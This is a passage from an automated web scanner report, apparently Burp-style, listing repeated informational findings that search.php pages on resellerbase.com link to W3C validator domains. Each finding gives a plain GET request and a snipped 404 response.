Host:   http://www.resellerbase.com
Path:   /detail/23/themes/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; those visible in the truncated response below are validator.w3.org and jigsaw.w3.org.

Request

GET /detail/23/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.160. http://www.resellerbase.com/detail/25/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/25/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; those visible in the truncated response below are validator.w3.org and jigsaw.w3.org.

Request

GET /detail/25/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/25/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.161. http://www.resellerbase.com/detail/26/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/26/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; those visible in the truncated response below are validator.w3.org and jigsaw.w3.org.

Request

GET /detail/26/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/26/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.162. http://www.resellerbase.com/detail/28/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; those visible in the truncated response below are validator.w3.org and jigsaw.w3.org.

Request

GET /detail/28/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/28/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.163. http://www.resellerbase.com/detail/29/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; those visible in the truncated response below are validator.w3.org and jigsaw.w3.org.

Request

GET /detail/29/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.164. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; those visible in the truncated response below are validator.w3.org and jigsaw.w3.org.

Request

GET /detail/29/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.165. http://www.resellerbase.com/detail/29/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; those visible in the truncated response below are validator.w3.org and jigsaw.w3.org.

Request

GET /detail/29/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.166. http://www.resellerbase.com/detail/29/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; those visible in the truncated response below are validator.w3.org and jigsaw.w3.org.

Request

GET /detail/29/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.167. http://www.resellerbase.com/detail/29/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; those visible in the truncated response below are validator.w3.org and jigsaw.w3.org.

Request

GET /detail/29/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.168. http://www.resellerbase.com/detail/30/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; those visible in the truncated response below are validator.w3.org and jigsaw.w3.org.

Request

GET /detail/30/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.169. http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; those visible in the truncated response below are validator.w3.org and jigsaw.w3.org.

Request

GET /detail/30/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.170. http://www.resellerbase.com/detail/30/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; those visible in the truncated response below are validator.w3.org and jigsaw.w3.org.

Request

GET /detail/30/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.171. http://www.resellerbase.com/detail/30/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; those visible in the truncated response below are validator.w3.org and jigsaw.w3.org.

Request

GET /detail/30/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.172. http://www.resellerbase.com/detail/30/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/search.php

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; those visible in the truncated response below are validator.w3.org and jigsaw.w3.org.

Request

GET /detail/30/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.173. http://www.resellerbase.com/detail/31/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/31/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.174. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/31/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.175. http://www.resellerbase.com/detail/31/themes/kosmos/images/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/31/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.176. http://www.resellerbase.com/detail/31/themes/kosmos/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/31/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.177. http://www.resellerbase.com/detail/31/themes/search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /detail/31/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
